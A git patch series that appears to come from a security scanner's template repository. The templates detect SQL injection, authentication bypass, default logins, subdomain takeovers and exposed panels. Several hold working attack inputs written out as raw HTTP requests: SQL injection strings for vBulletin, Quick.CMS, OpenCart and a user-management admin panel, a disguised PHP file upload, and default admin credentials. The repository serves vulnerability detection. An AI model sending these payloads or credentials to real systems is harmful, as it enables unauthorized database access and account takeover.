name="image"; filename="{{filename}}.php.png" + Content-Type: image/png + + + + + + --xYzZY-- + + payloads: + paths: + - 'cartabandonmentpro' + - 'cartabandonmentproOld' + + stop-at-first-match: true + host-redirects: true + max-redirects: 3 + + matchers-condition: and + matchers: + - type: word + words: + - "{{filename}}.php.png" + part: body + - type: dsl + dsl: + - status_code == 200 \ No newline at end of file diff --git a/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml new file mode 100644 index 0000000000..7315e6d64d --- /dev/null +++ b/http/vulnerabilities/vbulletin/vbulletin-search-sqli.yaml @@ -0,0 +1,37 @@ +id: vbulletin-search-sqli +info: + name: vBulletin Search.php SQL Injection + author: MaStErChO + severity: high + description: | + vBulletin 4 is vulnerable to an SQL injection vulnerability, which may allow an attacker can execute malicious SQL statements that control a web application's database server. + reference: + - https://www.exploit-db.com/exploits/17314 + - https://web.archive.org/web/20181129123620/https://j0hnx3r.org/vbulletin-4-x-sql-injection-vulnerability/ + tags: vbulletin, ajaxreg, sql-injection + metadata: + max-request: 1 + shodan-query: http.component:"vBulletin" + + +http: + - raw: + - | + POST /search.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + contenttypeid=7&do=process&humanverify=1&cat[]=-1%27 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "type=dberror" + + - type: status + status: + - 200 + - 503 + condition: or \ No newline at end of file From 8413c702c56b62c4c7ff1f77b64f469ff55ffbf9 Mon Sep 17 00:00:00 2001 From: mastercho Date: Sat, 16 Mar 2024 19:42:53 +0200 Subject: [PATCH 0016/1768] yaml fix --- http/cves/2015/CVE-2015-4455.yaml | 8 ++++---- http/cves/2019/CVE-2019-7139.yaml | 24 ++++++++++++------------ 2 files changed, 16 insertions(+), 16 deletions(-) diff --git a/http/cves/2015/CVE-2015-4455.yaml b/http/cves/2015/CVE-2015-4455.yaml index 249258d551..a91002e7e8 100644 --- a/http/cves/2015/CVE-2015-4455.yaml +++ b/http/cves/2015/CVE-2015-4455.yaml @@ -45,13 +45,13 @@ http: Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg" Content-Type: text/html - {{randstr}} + {{randstr}} --a54906fe12c504cb01ca836d062f82fa-- matchers: - type: dsl dsl: - - 'contains(body_1, "Failed to upload file")' - - 'status_code_2 == 200' - - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' + - 'contains(body_1, "Failed to upload file")' + - 'status_code_2 == 200' + - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")' condition: and \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-7139.yaml b/http/cves/2019/CVE-2019-7139.yaml index 23f951d9cb..05a19e4e75 100644 --- a/http/cves/2019/CVE-2019-7139.yaml +++ b/http/cves/2019/CVE-2019-7139.yaml @@ -34,20 +34,20 @@ http: - type: dsl name: Blind dsl: - - 'contains(body_1, "text/x-magento-init")' - - 'status_code_2 == 200' - - 'status_code_3 == 400' - - 'contains(content_type_2, "application/json")' - - 'contains(content_type_3, "application/json")' - - 'len(body_2) == 2' - - 'len(body_3) == 2' + - 'contains(body_1, "text/x-magento-init")' + - 'status_code_2 == 200' + - 'status_code_3 == 400' + - 'contains(content_type_2, "application/json")' + - 'contains(content_type_3, "application/json")' + - 'len(body_2) == 2' + - 'len(body_3) == 2' condition: and - type: dsl name: Time dsl: - - 'contains(body_1, "text/x-magento-init")' - - 'duration_4>=6' - - 'contains(content_type_4, "application/json")' - - 'len(body_4) == 2' - condition: and \ No newline at end of file + - 'contains(body_1, "text/x-magento-init")' + - 'duration_4>=6' + - 'contains(content_type_4, "application/json")' + - 'len(body_4) == 2' + condition: and \ No newline at end of file From 49ad60920c0d11510491a78646942302e3708082 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Thu, 21 Mar 2024 11:37:28 -0400 Subject: [PATCH 0017/1768] quick cms sqli added --- .../vulnerabilities/other/quick-cms-sqli.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 http/vulnerabilities/other/quick-cms-sqli.yaml diff --git a/http/vulnerabilities/other/quick-cms-sqli.yaml b/http/vulnerabilities/other/quick-cms-sqli.yaml new file mode 100644 index 0000000000..87ab754eb0 --- /dev/null +++ b/http/vulnerabilities/other/quick-cms-sqli.yaml @@ -0,0 +1,40 @@ +id: quick-cms-sqli + +info: + name: Quick.CMS 6.7 SQL Injection Login Bypass + author: Kazgangap + severity: high + description: Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass. + reference: + - https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html + - https://www.exploit-db.com/exploits/51910 + tags: packetstorm,quickcms,sqli + +http: + - raw: + - | + POST /admin.php?p=login HTTP/1.1 + Host: {{Hostname}} + Cache-Control: max-age=0 + Upgrade-Insecure-Requests: 1 + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-US,en;q=0.9 + Cookie: PHPSESSID=ak4vbm4o3jq017nr17dkk7kb9a + + sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true + + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Log out" + + - type: status + status: + - 200 From 127086eb444afc3a6df18958d5cbb08f58fffe16 Mon Sep 17 00:00:00 2001 From: Rishi Date: Sun, 24 Mar 2024 11:58:26 +0000 Subject: [PATCH 0018/1768] bimi detect --- dns/bimi-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 dns/bimi-detect.yaml diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml new file mode 100644 index 0000000000..35b42ccff2 --- /dev/null +++ b/dns/bimi-detect.yaml @@ -0,0 +1,24 @@ +id: bimi-record-detect + +info: + name: BIMI Record - Detection + author: rxerium + severity: info + description: | + A BIMI record was detected + reference: + - https://postmarkapp.com/blog/what-the-heck-is-bimi + tags: dns,bimi + +dns: + - name: "{{FQDN}}" + type: TXT + matchers: + - type: word + words: + - "v=BIMI1" + + extractors: + - type: regex + regex: + - "v=BIMI1(.+)" \ No newline at end of file From 6ed631f48f739ebb942e5542e0739238f3a5ee83 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 28 Mar 2024 13:52:14 +0530 Subject: [PATCH 0019/1768] Updated matcher --- http/exposures/files/htdeployment.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/http/exposures/files/htdeployment.yaml b/http/exposures/files/htdeployment.yaml index ca0fe62fa5..2e36d49873 100644 --- a/http/exposures/files/htdeployment.yaml +++ b/http/exposures/files/htdeployment.yaml @@ -26,12 +26,14 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body - negative: true words: - - " Date: Thu, 28 Mar 2024 06:20:46 -0400 Subject: [PATCH 0020/1768] add User-Registration-Login-and-User-Management-System admin panel sqli --- ...tion-Login-and-User-Management-System.yaml | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml diff --git a/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml b/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml new file mode 100644 index 0000000000..abb84a9e22 --- /dev/null +++ b/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml @@ -0,0 +1,52 @@ +id: user-management-system-sqli +info: + name: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) + author: f0xy + severity: high + description: User Registration & Login and User Management System v3.0 admin panel has SQL vulnerability. Even though the person who discovered the vulnerability tested it in version 3.0, version 3.2 also contains the same vulnerability. It can be exploited by entering "*admin' -- -*" as the username parameter in the admin panel. + reference: + - https://www.exploit-db.com/exploits/51695 + +flow: http(1) && http(2) + +http: + - raw: + - |- + POST /loginsystem/admin HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate, br + Content-Type: application/x-www-form-urlencoded + Content-Length: 47 + Origin: http://192.168.1.100 + Connection: close + Cookie: security_level=0; PHPSESSID=5b333bjmc0bs13llmvld55ipps + Upgrade-Insecure-Requests: 1 + + username=admin%27+--+-&password=whatever&login= + host-redirects: true + - raw: + - |+ + GET /loginsystem/admin/dashboard.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate, br + Connection: close + Cookie: security_level=0; PHPSESSID=5b333bjmc0bs13llmvld55ipps + Upgrade-Insecure-Requests: 1 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Admin Panel" + + - type: status + status: + - 200 + + From 252eee4b7d7ac801354824027e4021b2ac910355 Mon Sep 17 00:00:00 2001 From: F0xy <102886311+Eyub-kurnaz@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:54:14 +0300 Subject: [PATCH 0021/1768] Update User-Registration-Login-and-User-Management-System.yaml --- .../User-Registration-Login-and-User-Management-System.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml b/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml index abb84a9e22..fb7bb63dee 100644 --- a/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml +++ b/http/vulnerabilities/other/User-Registration-Login-and-User-Management-System.yaml @@ -20,7 +20,7 @@ http: Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 47 - Origin: http://192.168.1.100 + Origin: {{BaseURL}} Connection: close Cookie: security_level=0; PHPSESSID=5b333bjmc0bs13llmvld55ipps Upgrade-Insecure-Requests: 1 From 4777563b2064588287fc2b54d3d5429066e0838e Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 2 Apr 2024 21:19:28 +0300 Subject: [PATCH 0022/1768] opencart-core-sqli add --- .../other/opencart-core-sqli.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/vulnerabilities/other/opencart-core-sqli.yaml diff --git a/http/vulnerabilities/other/opencart-core-sqli.yaml b/http/vulnerabilities/other/opencart-core-sqli.yaml new file mode 100644 index 0000000000..e2942693aa --- /dev/null +++ b/http/vulnerabilities/other/opencart-core-sqli.yaml @@ -0,0 +1,26 @@ +id: opencart-core-sqli +info: + name: OpenCart Core 4.0.2.3 - 'search' SQLi + author: Kazgangap + severity: high + description: | + Opencart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + reference: + - https://www.exploit-db.com/exploits/51940 + - https://cxsecurity.com/issue/WLB-2024040004 + tags: opencart,sqli + +http: + - method: GET + path: + - "{{BaseURL}}/index.php?route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(11)))uUDJ)-- Nabb" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=11' + + - type: status + status: + - 200 \ No newline at end of file From 8ef7903eacb6c3a05a182e8a24777c93c162cf35 Mon Sep 17 00:00:00 2001 From: Lucky-Pulse Date: Mon, 8 Apr 2024 12:10:06 +1200 Subject: [PATCH 0023/1768] This is a new template to hunt for webpack source maps. --- headless/webpack-sourcemap-hunter | 213 ++++++++++++++++++++++++++++++ 1 file changed, 213 insertions(+) create mode 100644 headless/webpack-sourcemap-hunter diff --git a/headless/webpack-sourcemap-hunter b/headless/webpack-sourcemap-hunter new file mode 100644 index 0000000000..3ef43a2acd --- /dev/null +++ b/headless/webpack-sourcemap-hunter @@ -0,0 +1,213 @@ +id: Webpack-Sourcemap +info: + name: Webpack-Sourcemap + author: lucky0x0d, PulseSecurity.co.nz + reference: + - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage + severity: low + tags: javascript,webpack,sourcemaps + classification: + cwe-id: CWE-200 + description: parses target to find scripts and then checks for a sourcemapconsumer, inline sourcemaps, if js files have map files, if sourcemap headers exists + metadata: + max-request: 1 + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + - action: sleep + args: + duration: 10 + - action: script + name: extract + args: + code: | + () => { + AAA = []; + window.performance.getEntriesByType("resource").forEach((element) => { if (element.initiatorType === 'script' || element.initiatorType === 'fetch'|| element.initiatorType === 'xmlhttprequest') {AAA.push(element.name)}}); + BBB = [...new Set(Array.from(document.querySelectorAll('script')).map(i => i.src))] + CCC = [...new Set(Array.from(document.querySelectorAll('link[as=script]')).map(i => i.href))] + return [...new Set([...AAA, ...BBB, ...CCC])]; + } + + extractors: + - type: regex + name: allscripts + internal: true + part: extract + regex: + - (?i)http(.[~a-zA-Z0-9.\/\-_:]+) + +flow: | + headless(); + http("check_base_srcmap_inline"); + for (let scripturi of iterate(template["allscripts"])) { + set ("scripturi", scripturi); + http("check_for_srcmap_header"); + http("check_for_srcmap_inline"); + http("check_for_srcmap_url"); + for (let mapuri of iterate(template["allmaps"])) { + set ("mapuri", mapuri); + http("fetch_absolute_srcmap"); + http("fetch_relative_srcmap"); + http("fetch_root_relative_srcmap"); + http("fetch_noscheme_srcmaps"); + }; + set ("allmaps", null); + }; + +http: + - method: GET + id: check_base_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{BaseURL}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_url + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + extractors: + - type: regex + name: allmaps + internal: true + group: 1 + regex: + - (?i)\/\/#\ssourceMappingURL=(.[~a-zA-Z0-9.\/\-_:]+) + + - method: GET + id: check_for_srcmap_inline + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: regex + name: Inline_SourceMap + regex: + - '(?i)sourceMappingURL=.*eyJ2ZXJzaW9uIjo' + + - type: regex + name: SourceMapConsumer_Present + regex: + - '(?i)SourceMapConsumer' + + - method: GET + id: check_for_srcmap_header + disable-cookie: true + redirects: true + path: + - '{{scripturi}}' + + matchers: + - type: dsl + name: Source_Map_Header + dsl: + - "regex('(?i)SourceMap', header)" + - "status_code != 301 && status_code != 302" + condition: and + + extractors: + - type: kval + kval: + - X_SourceMap + - SourceMap + + - method: GET + id: fetch_absolute_srcmap + disable-cookie: true + redirects: true + path: + - '{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,"([^/]+$)","")}}{{replace_regex(mapuri,"(^\/+)","")}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_root_relative_srcmap + disable-cookie: true + redirects: true + path: + - '{{replace_regex(scripturi,replace_regex(scripturi,"http.+//[^/]+",""),"")}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 + + - method: GET + id: fetch_noscheme_srcmaps + disable-cookie: true + redirects: true + path: + - '{{Scheme}}{{mapuri}}' + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - '"version":' + - '"mappings":' + - '"sources":' + - type: status + status: + - 200 From b620a56101f50534eecd6685c614e109e84a88a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Apr 2024 13:01:44 +0530 Subject: [PATCH 0024/1768] Create CVE-2024-25723.yaml --- passive/cves/2024/CVE-2024-25723.yaml | 43 +++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 passive/cves/2024/CVE-2024-25723.yaml diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml new file mode 100644 index 0000000000..99d86c16ce --- /dev/null +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-25723 + +info: + name: ZenML ZenML Server - Improper Authentication + author: David Botelho Mariano + severity: critical + description: ZenML Server in the ZenML machine learning package before 0.46.7 + for Python allows remote privilege escalation because the + /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on + the basis of a valid username along with a new password in the request body. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Implement proper authentication mechanisms and ensure access controls are correctly configured. + reference: + - https://www.zenml.io/blog/critical-security-update-for-zenml-users + - https://github.com/zenml-io/zenml + classification: + epss-score: 0.00045 + epss-percentile: 0.13559 + tags: cve,cve2024,passive,auth-bypass,zenml + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/info" + + matchers: + - type: dsl + dsl: + - "compare_versions(version, '< 0.46.7')" + - "!contains_any(version, '0.44.4', '0.43.1', '0.42.2')" + - "contains_all(body, 'deployment_type', 'database_type')" + condition: and + + extractors: + - type: regex + part: body + group: 1 + name: version + regex: + - '"version":"(.*?)"' + internal: true From 3de60f724af430a52a696bf309131f1143170e09 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Apr 2024 13:05:02 +0530 Subject: [PATCH 0025/1768] format-update --- passive/cves/2024/CVE-2024-25723.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 99d86c16ce..16b1b7edf6 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -4,10 +4,8 @@ info: name: ZenML ZenML Server - Improper Authentication author: David Botelho Mariano severity: critical - description: ZenML Server in the ZenML machine learning package before 0.46.7 - for Python allows remote privilege escalation because the - /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on - the basis of a valid username along with a new password in the request body. + description: + ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. impact: | Successful exploitation could lead to unauthorized access to sensitive data. remediation: | @@ -15,6 +13,9 @@ info: reference: - https://www.zenml.io/blog/critical-security-update-for-zenml-users - https://github.com/zenml-io/zenml + - https://github.com/zenml-io/zenml/compare/0.42.1...0.42.2 + - https://github.com/zenml-io/zenml/compare/0.43.0...0.43.1 + - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 classification: epss-score: 0.00045 epss-percentile: 0.13559 From 1bd2160803ec9ba5e0d5c8832a6f4c961f8d11d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Apr 2024 13:08:38 +0530 Subject: [PATCH 0026/1768] Update CVE-2024-25723.yaml --- passive/cves/2024/CVE-2024-25723.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 16b1b7edf6..611ffe34ae 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -4,7 +4,7 @@ info: name: ZenML ZenML Server - Improper Authentication author: David Botelho Mariano severity: critical - description: + description: | ZenML Server in the ZenML machine learning package before 0.46.7 for Python allows remote privilege escalation because the /api/v1/users/{user_name_or_id}/activate REST API endpoint allows access on the basis of a valid username along with a new password in the request body. impact: | Successful exploitation could lead to unauthorized access to sensitive data. From 45d76297e3d79185ff64d64ebcc69eaa98ac12e1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Apr 2024 13:11:08 +0530 Subject: [PATCH 0027/1768] added metadata --- passive/cves/2024/CVE-2024-25723.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/passive/cves/2024/CVE-2024-25723.yaml b/passive/cves/2024/CVE-2024-25723.yaml index 611ffe34ae..3d34c505da 100644 --- a/passive/cves/2024/CVE-2024-25723.yaml +++ b/passive/cves/2024/CVE-2024-25723.yaml @@ -19,6 +19,11 @@ info: classification: epss-score: 0.00045 epss-percentile: 0.13559 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-2028554187 + fofa-query: body="ZenML" tags: cve,cve2024,passive,auth-bypass,zenml http: From c11fc50a3a2eded8eb4d18ba1bcde495c0b71f1b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 8 Apr 2024 13:33:08 +0530 Subject: [PATCH 0028/1768] Create akhq-panel.yaml --- http/exposed-panels/akhq-panel.yaml | 30 +++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/exposed-panels/akhq-panel.yaml diff --git a/http/exposed-panels/akhq-panel.yaml b/http/exposed-panels/akhq-panel.yaml new file mode 100644 index 0000000000..e01571820d --- /dev/null +++ b/http/exposed-panels/akhq-panel.yaml @@ -0,0 +1,30 @@ +id: akhq-panel + +info: + name: AKHQ Panel - Detect + author: DhiyaneshDK + severity: info + description: | + AKHQ Panel was discovered. + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:855432563 + fofa-query: body="AKHQ_PREFIX_UI" + tags: akhq,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}/ui/login" + + matchers-condition: and + matchers: + - type: word + words: + - "AKHQ" + part: body + + - type: status + status: + - 200 From dc4019ff0ce089802a84ff4f12190b2ab5fa96dc Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 10 Apr 2024 01:32:05 -0500 Subject: [PATCH 0029/1768] Create gohire-takeover.yaml I tested it myself --- http/takeovers/gohire-takeover.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 http/takeovers/gohire-takeover.yaml diff --git a/http/takeovers/gohire-takeover.yaml b/http/takeovers/gohire-takeover.yaml new file mode 100644 index 0000000000..473d53d7db --- /dev/null +++ b/http/takeovers/gohire-takeover.yaml @@ -0,0 +1,18 @@ +id: gohire-takeover + +info: + name: gohire takeover detection + author: philippedelteil + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/403 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "You may have followed an invalid link or the job you are looking for has been archived" From 853052fa6b66ef74fe1bc9430ec5d3d90858c5b1 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 10 Apr 2024 01:45:18 -0500 Subject: [PATCH 0030/1768] Create helpdocs.io-takeover.yaml --- http/takeovers/helpdocs.io-takeover.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 http/takeovers/helpdocs.io-takeover.yaml diff --git a/http/takeovers/helpdocs.io-takeover.yaml b/http/takeovers/helpdocs.io-takeover.yaml new file mode 100644 index 0000000000..6678f267d2 --- /dev/null +++ b/http/takeovers/helpdocs.io-takeover.yaml @@ -0,0 +1,19 @@ +id: helpdocs.io-takeover + +info: + name: helpdocs.io takeover detection + author: philippedelteil + severity: info + tags: takeover + reference: https://github.com/EdOverflow/issues/402 + +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "You've tried to access an account/page that does not exist" From d65eb953eea6d9e76b106f75a6123599b81e0a90 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 10 Apr 2024 15:24:06 +0530 Subject: [PATCH 0031/1768] Update and rename helpdocs.io-takeover.yaml to helpdocs-io-takeover.yaml --- .../{helpdocs.io-takeover.yaml => helpdocs-io-takeover.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/takeovers/{helpdocs.io-takeover.yaml => helpdocs-io-takeover.yaml} (93%) diff --git a/http/takeovers/helpdocs.io-takeover.yaml b/http/takeovers/helpdocs-io-takeover.yaml similarity index 93% rename from http/takeovers/helpdocs.io-takeover.yaml rename to http/takeovers/helpdocs-io-takeover.yaml index 6678f267d2..21d8232539 100644 --- a/http/takeovers/helpdocs.io-takeover.yaml +++ b/http/takeovers/helpdocs-io-takeover.yaml @@ -1,4 +1,4 @@ -id: helpdocs.io-takeover +id: helpdocs-io-takeover info: name: helpdocs.io takeover detection From 63427f8332a0c0174b4c6e35d6a70a649b3304e9 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 10 Apr 2024 13:20:31 -0500 Subject: [PATCH 0032/1768] Create betteruptime-takeover.yaml --- http/takeovers/betteruptime-takeover.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 http/takeovers/betteruptime-takeover.yaml diff --git a/http/takeovers/betteruptime-takeover.yaml b/http/takeovers/betteruptime-takeover.yaml new file mode 100644 index 0000000000..c3ff35039d --- /dev/null +++ b/http/takeovers/betteruptime-takeover.yaml @@ -0,0 +1,17 @@ +id: betteruptime-takeover + +info: + name: betteruptime takeover detection + author: philippedelteil + severity: info + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/368 + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - 'You are being redirected.' From 12873950d26fa56299f7d9305a513201f2ae2c90 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Apr 2024 08:42:47 +0530 Subject: [PATCH 0033/1768] Create ampjuke-default-login.yaml --- .../default-logins/ampjuke-default-login.yaml | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 http/default-logins/ampjuke-default-login.yaml diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml new file mode 100644 index 0000000000..125086f0a2 --- /dev/null +++ b/http/default-logins/ampjuke-default-login.yaml @@ -0,0 +1,61 @@ +id: ampjuke-default-login + +info: + name: AmpJuke - Default Login + author: ritikchaddha + severity: high + description: | + AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. + metadata: + max-request: 2 + shodan-query: http.favicon.hash:-121681558 + tags: default-login,ampjuke + +http: + - raw: + - | + GET /login.php HTTP/2 + Host: {{Hostname}} + + - | + POST /loginvalidate.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit + + - | + GET /index.php?what=welcome HTTP/2 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - admin + password: + - pass + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - 'AmpJuke' + - 'Track' + - 'Logout' + - 'Random play' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_1 + name: token + group: 1 + regex: + - 'name="uuid" value="([./a-z0-9-]+)">' + internal: true From ebec3c12193cfdc44eaa6486a96de7bbc4da0f6d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 11 Apr 2024 10:01:28 +0530 Subject: [PATCH 0034/1768] Create barco-clickshare-default-login.yaml --- .../barco-clickshare-default-login.yaml | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/default-logins/barco-clickshare-default-login.yaml diff --git a/http/default-logins/barco-clickshare-default-login.yaml b/http/default-logins/barco-clickshare-default-login.yaml new file mode 100644 index 0000000000..60c3c4efc0 --- /dev/null +++ b/http/default-logins/barco-clickshare-default-login.yaml @@ -0,0 +1,53 @@ +id: barco-clickshare-default-login + +info: + name: Barco ClickShare - Default Login + author: ritikchaddha + severity: high + description: | + Barco ClickShare contains a default login vulnerability. Default login password 'admin' was found. + metadata: + max-request: 3 + shodan-query: "ClickShareSession" + tags: default-login,barco,clickshare + +http: + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login/log_me_in HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_protection_token={{token}}&username={{username}}&password={{password}}&eula_accepted=true + + - | + GET /configuration_wizard HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers: + - type: dsl + dsl: + - 'status_code_2 == 303 || status_code_2 == 302' + - 'contains(body_3, "ClickShare Configuration Wizard")' + - 'contains(location_2, "/dashboard")' + condition: and + + extractors: + - type: regex + part: body + name: token + group: 1 + regex: + - '="csrf_protection_token" value="([0-9a-z]+)" \/>' + internal: true From a8b5cb8b7036a5af42d47bfe8b0fbb0e456ce822 Mon Sep 17 00:00:00 2001 From: pbuff07 Date: Thu, 11 Apr 2024 12:36:53 +0800 Subject: [PATCH 0035/1768] add Ollama_LLM --- http/exposed-panels/ollama-llm-panel.yaml | 29 +++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 